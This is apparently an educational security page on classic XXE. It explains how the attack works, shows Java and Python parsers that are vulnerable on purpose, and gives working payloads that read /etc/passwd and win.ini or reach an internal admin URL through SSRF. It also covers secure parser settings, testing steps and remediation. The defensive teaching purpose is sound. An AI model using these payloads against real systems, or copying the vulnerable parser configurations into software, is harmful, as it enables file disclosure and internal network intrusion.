🔴 Critical (CVSS 9.1)

Classic XXE (Direct Entity Expansion)

Understanding direct XML external entity attacks where entity content is reflected in the application's response, allowing immediate data exfiltration.

CWE-611 · A05:2021 – Security Misconfiguration

Overview

Classic XXE (also called in-band XXE) occurs when an XML parser processes external entities and includes their content in the application's response. This is the most straightforward form of XXE attack, where the attacker can immediately see the results of the entity expansion.

When exploited successfully, Classic XXE allows attackers to:

  • Read arbitrary files from the server's filesystem
  • Perform Server-Side Request Forgery (SSRF) attacks
  • Cause Denial of Service (DoS)
  • In some cases, achieve Remote Code Execution (for example, on PHP deployments where the expect:// wrapper is enabled)

This vulnerability has a CVSS score of 9.1 (Critical) due to its ease of exploitation and severe impact.

How Classic XXE Works

The attack follows these steps:

  1. Attacker crafts malicious XML: Creates an XML document with a DOCTYPE declaration containing an external entity definition
  2. External entity references a target resource: The entity points to a local file (file:///) or a network resource (http://)
  3. Application parses XML: The vulnerable application processes the XML with an insecurely configured parser
  4. Parser retrieves content: The XML parser automatically retrieves the referenced resource
  5. Content reflected in response: The expanded entity content appears in the application's response
  6. Attacker reads data: The attacker extracts sensitive information from the response
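The steps above can be reproduced safely against a throwaway file. The following is a minimal sketch, not a real application: it uses Python's standard-library SAX parser, which has ignored external general entities by default since Python 3.7.1, so the sketch switches that feature on explicitly to imitate an insecurely configured parser. The names TextCollector, parse_and_reflect, and demo are illustrative, and the "secret" is a temporary file created by the sketch itself.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource


class TextCollector(ContentHandler):
    """Collects character data, standing in for an app that echoes <data>."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_and_reflect(xml_bytes, resolve_external):
    """Parse the document and return the text an application might reflect."""
    parser = xml.sax.make_parser()
    # True imitates an insecure parser; False is the hardened setting.
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    source = InputSource()
    source.setByteStream(io.BytesIO(xml_bytes))
    parser.parse(source)
    return "".join(collector.chunks)


def demo():
    """Return (reflected text with entities resolved, reflected text without)."""
    with tempfile.TemporaryDirectory() as tmp:
        # Stand-in for a sensitive server-side file.
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text("demo-secret-value", encoding="utf-8")
        # Steps 1-2: a DOCTYPE with an external entity pointing at the file.
        payload = (
            '<?xml version="1.0" encoding="UTF-8"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{secret.as_uri()}">]>\n'
            "<root><data>&xxe;</data></root>"
        ).encode("utf-8")
        # Steps 3-5: parse, let the parser fetch the resource, reflect the text.
        return parse_and_reflect(payload, True), parse_and_reflect(payload, False)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("entities resolved:    ", repr(vulnerable))
    print("entities not resolved:", repr(hardened))
```

With external entity resolution enabled, the file contents end up in the reflected text; with it disabled, the entity is skipped and nothing from the file appears.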

Vulnerable Code Examples

These code examples show how XXE vulnerabilities occur when developers parse XML without proper security configuration:

Vulnerable Java Code

Java · VulnerableXmlParser.java · ⚠️ Vulnerable
// VULNERABLE CODE - DO NOT USE IN PRODUCTION
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class VulnerableXmlParser {
    public Document parseXml(String xmlInput) throws Exception {
        // Default configuration - VULNERABLE!
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();

        // This will process external entities by default
        Document doc = builder.parse(
            new InputSource(new StringReader(xmlInput))
        );

        return doc;
    }
}

Vulnerable Python Code

Python · vulnerable_parser.py · ⚠️ Vulnerable
# VULNERABLE CODE - DO NOT USE IN PRODUCTION
import xml.etree.ElementTree as ET
from lxml import etree

def parse_xml(xml_string):
    # Standard-library ElementTree does not fetch external entities (it raises
    # ParseError on the undefined entity), but it applies no DTD hardening and
    # is exposed to entity-expansion DoS on Expat builds older than 2.4.1.
    root = ET.fromstring(xml_string)
    return root

def parse_xml_lxml(xml_string):
    # VULNERABLE - in lxml releases before 5.0 the default parser resolves
    # external entities (resolve_entities=True), so file:// entities are read
    parser = etree.XMLParser()
    root = etree.fromstring(xml_string, parser)
    return root

Attack Payload: File Disclosure

This payload demonstrates reading /etc/passwd on Linux systems:

Linux File Disclosure Payload

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Windows File Disclosure Payload

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<root>
  <data>&xxe;</data>
</root>

SSRF Attack Payload

This payload makes the server send a request to an internal network resource:

SSRF Payload Example

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<root>
  <data>&xxe;</data>
</root>

Expected Response

When the attack succeeds, the application's response will contain the file contents or internal server response:

Vulnerable Response Example

XML
<root>
  <data>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
  </data>
</root>

Secure Configuration

To prevent XXE attacks, you must explicitly disable external entity processing and DTD processing:

Secure Java Configuration

Java · SecureXmlParser.java · ✓ Secure
// SECURE CODE
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class SecureXmlParser {
    public Document parseXml(String xmlInput) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

        // Disable DOCTYPE declarations entirely (most secure)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl",
            true
        );

        // If you can't disable DOCTYPE, disable external entities
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities",
            false
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities",
            false
        );

        // Disable external DTDs
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd",
            false
        );

        // Disable XInclude
        factory.setXIncludeAware(false);

        // Disable expanding entity references
        factory.setExpandEntityReferences(false);

        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(
            new InputSource(new StringReader(xmlInput))
        );

        return doc;
    }
}

Secure Python Configuration

Python · secure_parser.py · ✓ Secure
# SECURE CODE
from lxml import etree
from defusedxml import ElementTree as DefusedET

# Option 1: Use defusedxml (recommended)
def parse_xml_safe(xml_string):
    # defusedxml automatically disables dangerous features
    root = DefusedET.fromstring(xml_string)
    return root

# Option 2: Configure lxml securely
def parse_xml_lxml_safe(xml_string):
    # Create parser with disabled entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False
    )
    root = etree.fromstring(xml_string, parser)
    return root
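Where neither defusedxml nor lxml can be installed, refusing DOCTYPE declarations outright can be approximated with the standard library alone. The following is a minimal sketch under that assumption: DoctypeForbidden and parse_without_doctype are illustrative names, not part of any library. It runs a first pass with Expat to reject any document that declares a DOCTYPE, then builds the tree with ElementTree.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE (hypothetical helper type)."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Expat calls this as soon as it reaches <!DOCTYPE ...>, before any
    # entity declared inside the DTD can be referenced.
    raise DoctypeForbidden(f"DOCTYPE declaration not allowed: {name!r}")


def parse_without_doctype(xml_text):
    """Return the root element, or raise DoctypeForbidden if a DTD is present."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)  # first pass: scan only, build nothing
    return ET.fromstring(xml_text)  # second pass: build the element tree


if __name__ == "__main__":
    print(parse_without_doctype("<root><data>ok</data></root>").findtext("data"))
```

Parsing the input twice costs some time on large documents. The trade-off is that the check stays independent of the tree builder, so the same guard could sit in front of a different parser.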

Impact and Risk

Classic XXE vulnerabilities have severe security implications:

Confidentiality Impact: HIGH

  • Access to sensitive files (/etc/passwd, application config files, and /etc/shadow if the parsing process runs as root)
  • Database credentials and API keys
  • Source code and intellectual property
  • User data and PII

Integrity Impact: LOW-MEDIUM

  • Usually limited to data exfiltration
  • Can lead to SSRF attacks that modify internal state

Availability Impact: MEDIUM-HIGH

  • Billion Laughs attack can cause DoS
  • Resource exhaustion from large file reads
  • System crashes from parsing malformed data

Real-World Examples:

  • Reading cloud metadata endpoints (AWS, Azure, GCP)
  • Accessing internal admin panels
  • Exfiltrating database backups
  • Reading application source code

Detection and Testing

To test for Classic XXE vulnerabilities:

  1. Identify XML input points: API endpoints, file uploads, SOAP services
  2. Test with basic payload: Submit XML with external entity referencing a known file
  3. Observe response: Check if file contents appear in the response
  4. Test SSRF: Try referencing an attacker-controlled server to confirm outbound requests
  5. Automated scanning: Use Burp Suite, OWASP ZAP, or custom scripts

Key indicators of vulnerability:

  • Application accepts XML input
  • Response contains expanded entity content
  • Application makes outbound requests to attacker-controlled servers
  • Error messages reveal file paths or entity processing
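The submit-and-observe steps can be scripted. The following is a minimal sketch, assuming an endpoint you are authorised to test: the send callable is a hypothetical transport function (for example, a thin wrapper around an HTTP client) that posts the XML and returns the response body as text. The passwd pattern is a simple heuristic for Linux targets, not a complete detector.

```python
import re
from typing import Callable

# Heuristic: the root entry of /etc/passwd, e.g. "root:x:0:0:".
PASSWD_ROOT_ENTRY = re.compile(r"\broot:[^:\n]*:0:0:")

# The Linux file disclosure payload.
PROBE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<!DOCTYPE foo [\n"
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    "]>\n"
    "<root>\n"
    "  <data>&xxe;</data>\n"
    "</root>"
)


def reflects_passwd(response_body: str) -> bool:
    """Return True if the response appears to contain /etc/passwd content."""
    return PASSWD_ROOT_ENTRY.search(response_body) is not None


def probe_endpoint(send: Callable[[str], str]) -> bool:
    """Submit the probe through `send` and report whether content was reflected."""
    return reflects_passwd(send(PROBE))
```

A False result only means that this payload was not reflected. The parser may still resolve entities without echoing them, which is why the out-of-band SSRF check in step 4 remains worthwhile.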

Remediation Summary

  • Priority 1 (Critical): Disable DOCTYPE declarations entirely
  • Priority 2 (High): Disable external entity processing
  • Priority 3 (High): Disable DTD processing
  • Priority 4 (Medium): Implement input validation and allowlisting
  • Priority 5 (Medium): Use secure XML parsing libraries (e.g., defusedxml)
  • Priority 6 (Low): Implement WAF rules to detect XXE patterns

Refer to language-specific prevention guides for detailed implementation instructions.